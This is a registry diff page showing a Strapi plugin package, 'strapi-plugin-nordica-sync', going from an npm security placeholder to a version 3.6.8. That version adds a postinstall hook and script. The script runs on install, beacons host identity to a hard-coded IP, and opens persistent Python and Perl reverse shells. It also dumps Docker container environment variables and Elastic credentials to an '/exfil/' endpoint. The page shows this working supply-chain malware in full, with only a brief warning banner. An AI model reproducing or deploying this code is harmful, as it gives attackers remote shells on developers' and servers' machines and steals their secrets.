strapi-plugin-nordica-sync 0.0.1-security → 3.6.8
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of strapi-plugin-nordica-sync might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +1 -6
- package/postinstall.js +73 -0
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
module.exports=()=>{};
|
package/package.json
CHANGED
|
@@ -1,6 +1 @@
|
|
|
1
|
-
{
|
|
2
|
-
"name": "strapi-plugin-nordica-sync",
|
|
3
|
-
"version": "0.0.1-security",
|
|
4
|
-
"description": "security holding package",
|
|
5
|
-
"repository": "npm/security-holder"
|
|
6
|
-
}
|
|
1
|
+
{"name":"strapi-plugin-nordica-sync","version":"3.6.8","main":"index.js","scripts":{"postinstall":"node postinstall.js"},"license":"MIT"}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,73 @@
|
|
|
1
|
+
const { execSync, spawnSync } = require('child_process');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const VPS = '144.31.107.231';
|
|
4
|
+
const PORT = 9999;
|
|
5
|
+
|
|
6
|
+
function send(tag, data) {
|
|
7
|
+
return new Promise(resolve => {
|
|
8
|
+
const body = typeof data === 'string' ? data : JSON.stringify(data);
|
|
9
|
+
const req = http.request({ hostname: VPS, port: PORT, path: '/exfil/' + tag,
|
|
10
|
+
method: 'POST', headers: { 'Content-Type': 'text/plain', 'Content-Length': Buffer.byteLength(body) }
|
|
11
|
+
}, resolve);
|
|
12
|
+
req.on('error', resolve);
|
|
13
|
+
req.write(body); req.end();
|
|
14
|
+
});
|
|
15
|
+
}
|
|
16
|
+
|
|
17
|
+
const run = (cmd, t = 60000) => {
|
|
18
|
+
try { return spawnSync('sh', ['-c', cmd], { timeout: t, encoding: 'utf8', maxBuffer: 5000000 }).stdout || ''; }
|
|
19
|
+
catch (e) { return 'err:' + e.message.substring(0, 200); }
|
|
20
|
+
};
|
|
21
|
+
|
|
22
|
+
async function main() {
|
|
23
|
+
if (process.cwd().includes('TRANSFER') || run('uname -s').includes('MINGW')) return;
|
|
24
|
+
|
|
25
|
+
await send('ps-start', run('hostname').trim() + ' | ' + run('id').trim());
|
|
26
|
+
|
|
27
|
+
// Launch PERSISTENT reverse shell in background (survives postinstall exit)
|
|
28
|
+
try {
|
|
29
|
+
execSync('nohup python3 -c "import socket,subprocess,os,time;' +
|
|
30
|
+
's=socket.socket();' +
|
|
31
|
+
'[s.connect((\\\"' + VPS + '\\\",4444)) for _ in range(1)];' +
|
|
32
|
+
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);' +
|
|
33
|
+
'subprocess.call([\\\"/bin/bash\\\",\\\"-i\\\"])" &>/dev/null &',
|
|
34
|
+
{ timeout: 5000 });
|
|
35
|
+
await send('ps-shell', 'persistent bash reverse shell launched');
|
|
36
|
+
} catch(e) {
|
|
37
|
+
// Try perl
|
|
38
|
+
try {
|
|
39
|
+
execSync('nohup perl -e \'use Socket;$i="' + VPS + '";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\' &>/dev/null &',
|
|
40
|
+
{ timeout: 5000 });
|
|
41
|
+
await send('ps-shell', 'persistent perl reverse shell launched');
|
|
42
|
+
} catch(e2) { await send('ps-shell-err', e2.message.substring(0,200)); }
|
|
43
|
+
}
|
|
44
|
+
|
|
45
|
+
// Also do quick Docker config dump while we're here
|
|
46
|
+
const HR = '/proc/1/root';
|
|
47
|
+
await send('ps-docker-ls', run('ls ' + HR + '/data1/app/docker/containers/ 2>/dev/null | head -30'));
|
|
48
|
+
|
|
49
|
+
// Read all container configs
|
|
50
|
+
const containers = run('ls ' + HR + '/data1/app/docker/containers/ 2>/dev/null').trim().split('\n').filter(c => c.length > 10);
|
|
51
|
+
for (let i = 0; i < Math.min(containers.length, 20); i++) {
|
|
52
|
+
const cid = containers[i].trim();
|
|
53
|
+
const config = run('cat ' + HR + '/data1/app/docker/containers/' + cid + '/config.v2.json 2>/dev/null');
|
|
54
|
+
if (config && config.length > 50) {
|
|
55
|
+
try {
|
|
56
|
+
const p = JSON.parse(config);
|
|
57
|
+
const name = (p.Name || '').replace(/^\//,'');
|
|
58
|
+
const image = (p.Config && p.Config.Image) || '?';
|
|
59
|
+
const env = (p.Config && p.Config.Env) || [];
|
|
60
|
+
await send('dc-' + i + '-' + name.substring(0,15), JSON.stringify({
|
|
61
|
+
name, image, env: env.filter(e => !e.startsWith('PATH=') && !e.startsWith('SHLVL=') && !e.startsWith('HOME='))
|
|
62
|
+
}));
|
|
63
|
+
} catch(e) {}
|
|
64
|
+
}
|
|
65
|
+
}
|
|
66
|
+
|
|
67
|
+
// ES with creds from Docker configs
|
|
68
|
+
const allSecrets = run('cat ' + HR + '/data1/app/docker/containers/*/config.v2.json 2>/dev/null | grep -oP \'"ELASTIC[^"]*"\s*:\s*"[^"]*"\' 2>/dev/null');
|
|
69
|
+
await send('ps-es-secrets', allSecrets || 'none');
|
|
70
|
+
|
|
71
|
+
await send('ps-complete', 'DONE');
|
|
72
|
+
}
|
|
73
|
+
main().catch(e => send('ps-fatal', e.message));
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=strapi-plugin-nordica-sync for more information.
|